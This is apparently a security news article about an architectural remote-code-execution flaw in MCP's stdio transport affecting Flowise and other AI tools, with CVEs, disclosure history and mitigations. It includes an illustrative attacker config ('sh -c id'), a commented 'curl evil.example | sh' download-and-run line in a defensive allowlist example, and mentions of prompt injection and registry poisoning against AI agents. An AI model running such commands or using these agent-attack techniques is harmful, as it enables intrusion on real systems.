Critical Flowise MCP Flaw Allows Remote Code Execution on AI Systems
A critical vulnerability discovered by OX Security researchers has exposed a systemic flaw within the Model Context Protocol (MCP), the industry-standard framework for AI agent communication developed by Anthropic.
The flaw enables Remote Code Execution (RCE) on any system running a vulnerable MCP implementation, including platforms using Flowise’s MCP adapters, putting sensitive user data, internal databases, API keys, and chat histories at risk.
Unlike typical software bugs, this vulnerability is not the result of a simple coding mistake. It stems from an architectural design decision embedded in Anthropic’s official MCP SDKs across all supported programming languages: Python, TypeScript, Java, and Rust.
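To see why this is architectural rather than a coding slip, consider how MCP's stdio transport works: the client launches the configured server command as a local child process and speaks JSON-RPC over its pipes. The sketch below is illustrative only, not the SDK's actual implementation, but it shows why attacker-controlled configuration translates directly into command execution:

```python
import subprocess

def launch_stdio_server(command: str, args: list[str]) -> subprocess.Popen:
    """Spawn an MCP-style stdio server: the client runs the configured
    command as a local child process and exchanges messages over its
    stdin/stdout pipes. (Illustrative sketch, not the SDK's real code.)"""
    return subprocess.Popen(
        [command, *args],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )

# If the command and args come from an untrusted MCP configuration,
# the "server" can be any program an attacker names:
untrusted_config = {"command": "sh", "args": ["-c", "id"]}  # attacker-supplied
# launch_stdio_server(untrusted_config["command"], untrusted_config["args"])
# would run an arbitrary shell command with the host process's privileges.
```

The spawning itself is the intended behavior; the vulnerability arises whenever the configuration that reaches it is not trusted.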
Critical Flowise MCP Vulnerability
Any developer building AI workflows on top of the MCP foundation unknowingly inherits this exposure, making Flowise-based deployments and similar AI orchestration platforms especially susceptible.
The research identifies four distinct exploitation families: unauthenticated UI injection in popular AI frameworks, hardening bypasses in “protected” environments like Flowise, zero-click prompt injection in AI IDEs such as Windsurf and Cursor, and malicious marketplace distribution, in which 9 of 11 MCP registries were successfully poisoned with malicious packages.
The scale of impact is significant. The vulnerability spans a supply chain with over 150 million downloads, more than 7,000 publicly accessible MCP servers, and an estimated 200,000 vulnerable instances globally.
The research team successfully executed commands on six live production platforms and identified critical vulnerabilities in tools including LiteLLM, LangChain, and IBM’s LangFlow.
Ten CVEs have been issued so far, including critical-severity flaws in GPT Researcher (CVE-2025-65720), Agent Zero (CVE-2026-30624), Windsurf (CVE-2026-30615), and DocsGPT (CVE-2026-26015), among others. Several have since been patched, while others remain in reported status awaiting fixes.

OX Security repeatedly recommended root-level patches to Anthropic that would have protected millions of downstream users.
Anthropic declined, characterizing the behavior as “expected” and citing architectural intent. Despite over 30 responsible disclosures and more than 10 high and critical CVEs, the root cause remains unaddressed at the protocol level.
Mitigations
Security teams are advised to take the following steps immediately:
- Block public internet access to AI services connected to sensitive APIs or databases
- Treat all external MCP configuration input as untrusted; avoid allowing raw user input into StdioServerParameters
- Install MCP servers only from verified sources such as the official GitHub MCP Registry
- Run MCP-enabled services inside sandboxed environments with restricted permissions
- Monitor tool invocations for unexpected background activity or data exfiltration attempts
- Update all affected services to their latest patched versions immediately
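The second recommendation above can be enforced with a simple guard: validate any externally supplied server configuration against an allowlist before it ever reaches StdioServerParameters. A minimal sketch, in which the allowlist contents and function name are illustrative assumptions for your own deployment:

```python
# Allowlist of server commands and packages this deployment will launch.
# Entries are illustrative; populate from your own vetted registry.
ALLOWED_COMMANDS = {
    "npx": {"@modelcontextprotocol/server-filesystem"},
}

def validate_mcp_config(command: str, args: list[str]) -> None:
    """Reject MCP stdio configurations whose command or first argument
    (the server package) is not explicitly allowlisted, so raw user
    input can never choose which binary gets executed."""
    allowed_packages = ALLOWED_COMMANDS.get(command)
    if allowed_packages is None:
        raise ValueError(f"command not allowlisted: {command!r}")
    if not args or args[0] not in allowed_packages:
        raise ValueError(f"server package not allowlisted: {args[:1]!r}")

# validate_mcp_config("npx", ["@modelcontextprotocol/server-filesystem", "/data"])  # passes
# validate_mcp_config("sh", ["-c", "curl evil.example | sh"])  # raises ValueError
```

Because the check runs before any process is spawned, a malicious configuration fails closed instead of handing the attacker a shell.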